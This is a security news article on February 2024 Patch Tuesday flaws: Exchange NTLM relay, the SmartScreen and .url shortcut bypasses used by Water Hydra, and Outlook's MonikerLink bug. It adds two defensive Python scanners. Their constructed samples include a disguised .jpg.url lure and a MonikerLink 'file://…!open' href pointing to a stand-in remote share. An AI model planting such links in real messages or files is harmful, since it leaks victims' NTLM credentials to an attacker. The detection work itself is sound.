On Wednesday, Microsoft updated its advisory for CVE-2024-21410, a critical vulnerability in Exchange Server, to state that the flaw is being actively exploited in the wild. The fix itself had shipped the previous day as part of the company's monthly Patch Tuesday updates.

With a CVSS score of 9.8, the flaw is an elevation-of-privilege bug that is reached through NTLM relay rather than through a bug in Exchange's own code path. According to Microsoft's advisory, "An attacker could target an NTLM client such as Outlook, leading to leaked credentials that can be relayed against the Exchange server." In practice the attacker induces the victim's client to authenticate to a host they control, forwards that live NTLM exchange to Exchange, and is then authenticated as the victim, able to perform operations on the server as though they were the genuine user. Because the relay reuses an in-flight authentication rather than cracking a hash, password strength offers no protection; the defence is to bind the NTLM authentication to the TLS channel so that a relayed exchange is rejected.

Redmond's updated assessment marks the vulnerability as having confirmed exploitation. The accompanying Exchange Server 2019 Cumulative Update 14 (CU14) enables Extended Protection for Authentication (EPA) by default; EPA ties the NTLM authentication to the TLS connection between client and server, which is exactly the step a relaying attacker cannot reproduce. On Exchange 2016 and on earlier 2019 cumulative updates EPA is not switched on automatically and must be enabled by the administrator (Microsoft publishes a script for this), so installing the security update alone does not close the relay path. Details about the attack vectors used and the identity of the threat actors remain unclear. However, previous incidents implicate Russian state-affiliated groups such as APT28, which exploited the Outlook flaw CVE-2023-23397 to obtain NTLM credentials for relay attacks.

Reports in recent months indicate that APT28 has run targeted campaigns using this technique since at least April 2022, against organizations in sensitive sectors such as foreign affairs, energy, defense, and finance. The group's continued reliance on NTLM relay underscores a persistent and evolving capability.

The same update fixed two Windows security-feature-bypass flaws that were already being exploited: CVE-2024-21351, a bypass of Windows SmartScreen, and CVE-2024-21412, a bypass in the handling of Internet Shortcut (.url) files that lets a downloaded file evade Microsoft Defender SmartScreen. Trend Micro attributed exploitation of CVE-2024-21412 to the advanced persistent threat it tracks as Water Hydra (also known as DarkCasino), a group with a history of using zero-day vulnerabilities to deliver malware.

The attack chain uses internet shortcut (.url) files disguised as JPEG images. When a user opens one, CVE-2024-21412 lets the shortcut sidestep Microsoft Defender SmartScreen, so no warning is shown before the next stage runs and the Windows host is compromised.
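As an added example that is not part of the original article, the following Python triage script shows how a defender can inspect a .url shortcut for the two properties described above: a filename that stacks an image extension in front of the real .url extension, and a target that lives on a remote share (a UNC or remote file:// path), which forces Windows to authenticate over SMB or WebDAV when the shortcut is opened. It also flags a shortcut whose target is itself another .url file, a chaining heuristic that goes beyond what the article states. The sample shortcut text, the file name and the 203.0.113.10 address are constructed for the example.

```python
import configparser
import re
from dataclasses import dataclass, field

# Image extensions a lure might stack in front of ".url" so that the file
# looks like a picture while its real extension stays .url.
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


@dataclass
class ShortcutVerdict:
    file_name: str
    target: str
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def remote_host(target: str):
    """Return the host of a UNC or remote file:// target, or None.

    Local drive paths such as file:///C:/... and web URLs return None.
    """
    t = target.strip()
    if t[:5].lower() == "file:":
        t = t[5:]
    t = t.replace("\\", "/")
    m = re.match(r"^/{2,}([^/]+)(?:/|$)", t)
    if not m:
        return None
    host = m.group(1)
    if re.fullmatch(r"[A-Za-z]:", host):
        return None  # drive letter, not a host
    return host


def shortcut_target(text: str) -> str:
    """Extract the URL= value from the [InternetShortcut] section (INI syntax)."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return cp[section].get("url", "").strip()
    return ""


def analyze_shortcut(file_name: str, text: str) -> ShortcutVerdict:
    """Apply the three heuristics and return a verdict with human-readable findings."""
    target = shortcut_target(text)
    verdict = ShortcutVerdict(file_name=file_name, target=target)
    lower = file_name.lower()
    stem = lower[:-4] if lower.endswith(".url") else lower
    if stem.endswith(IMAGE_EXTS):
        verdict.findings.append("double extension: image name with a .url extension")
    host = remote_host(target)
    if host:
        verdict.findings.append(
            f"remote UNC/file target on {host}: opening it makes Windows authenticate over SMB/WebDAV"
        )
        if target.lower().rstrip("/\\").endswith(".url"):
            # Assumption of this example: a shortcut pointing at another shortcut is
            # treated as chaining and flagged.
            verdict.findings.append("target is itself a .url shortcut (shortcut-to-shortcut chaining)")
    return verdict


# Constructed sample shortcuts (not real captures).
LURE_SHORTCUT = r"""[InternetShortcut]
URL=file://\\203.0.113.10\share\stock-chart.jpg.url
IconIndex=0
"""

BENIGN_SHORTCUT = """[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for name, text in (("stock-chart.jpg.url", LURE_SHORTCUT), ("notes.url", BENIGN_SHORTCUT)):
        v = analyze_shortcut(name, text)
        print(name, "->", "SUSPICIOUS" if v.suspicious else "ok", v.findings)
```

The remote-host check is the one worth keeping even outside this campaign: any shortcut, document link or icon path that points at a host the user does not own will make the machine authenticate to that host, which is the precondition for every NTLM relay described on this page.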

The same Patch Tuesday also fixed CVE-2024-21413, a critical Outlook vulnerability that can lead to remote code execution and that bypasses Office Protected View. Dubbed MonikerLink by Check Point, which reported it, the bug stems from how Outlook parses "file://" hyperlinks: a link to a file on a remote share normally triggers a security warning, but appending a "!" followed by arbitrary text to the path makes Outlook treat the string as a COM moniker and resolve it without that warning. The victim's machine then connects to the attacker's server, leaking the user's NTLM credentials, and the moniker resolution can be abused further to reach code execution. The same parsing is shared by other Office applications, so the issue is not confined to Outlook.
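The following Python scanner is an added example, not code from the article or from Check Point, showing how a mail gateway or incident responder could pick out the two dangerous link shapes just described from an HTML message body: a "file://" link to a remote share (credential leak on click) and the MonikerLink form with a "!" after the path. The sample e-mail body and the 203.0.113.10 address are constructed for the example.

```python
import re
from html.parser import HTMLParser

# A file: link that names a remote host, in either UNC (\\host\share) or
# file://host/share form. Group 1 is the host, group 2 the rest of the path.
REMOTE_FILE_LINK = re.compile(r"^file:/{0,3}[\\/]{2}([^\\/]+)[\\/](.*)$", re.IGNORECASE)


class _HrefCollector(HTMLParser):
    """Collect href attributes of <a> tags without executing or following anything."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            for name, value in attrs:
                if name.lower() == "href" and value:
                    self.hrefs.append(value.strip())


def extract_hrefs(html: str):
    parser = _HrefCollector()
    parser.feed(html)
    return parser.hrefs


def classify_link(href: str) -> str:
    """Return 'moniker', 'remote-file' or 'ok' for a single hyperlink."""
    m = REMOTE_FILE_LINK.match(href)
    if not m:
        return "ok"
    host, rest = m.group(1), m.group(2)
    if re.fullmatch(r"[A-Za-z]:", host):
        return "ok"  # file:///C:/... is a local path, not a remote share
    # MonikerLink pattern: a '!' after the remote file path turns the string into a
    # COM moniker and skips Outlook's remote-link warning.
    if "!" in rest:
        return "moniker"
    # Plain remote file link: following it makes the client authenticate to 'host'.
    return "remote-file"


def scan_email_html(html: str):
    """Return (href, verdict) pairs for every link that is not 'ok'."""
    results = []
    for href in extract_hrefs(html):
        verdict = classify_link(href)
        if verdict != "ok":
            results.append((href, verdict))
    return results


# Constructed sample message body (not a real capture).
SAMPLE_EMAIL = r"""<html><body>
<p>Quarterly figures attached.</p>
<a href="https://www.example.com/report">Summary</a>
<a href="file://\\203.0.113.10\share\report.docx">Full report</a>
<a href="file:///\\203.0.113.10\share\report.rtf!open">Open in viewer</a>
</body></html>"""

if __name__ == "__main__":
    for href, verdict in scan_email_html(SAMPLE_EMAIL):
        print(f"{verdict:12s} {href}")
```

A "remote-file" hit is worth blocking on its own, since the click leaks credentials regardless of the patch state; the "moniker" form is the one that removed Outlook's warning before the February fix.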

Taken together, these vulnerabilities underline the need for organizations to apply the February patches promptly and, where Exchange is involved, to confirm that Extended Protection for Authentication is actually enabled rather than assuming the update turned it on. Defenders can map the activity to MITRE ATT&CK to reason about the relevant tactics: initial access through phishing lures and shortcut files, credential access and privilege escalation through NTLM relay, and execution through the Outlook and SmartScreen bypasses.
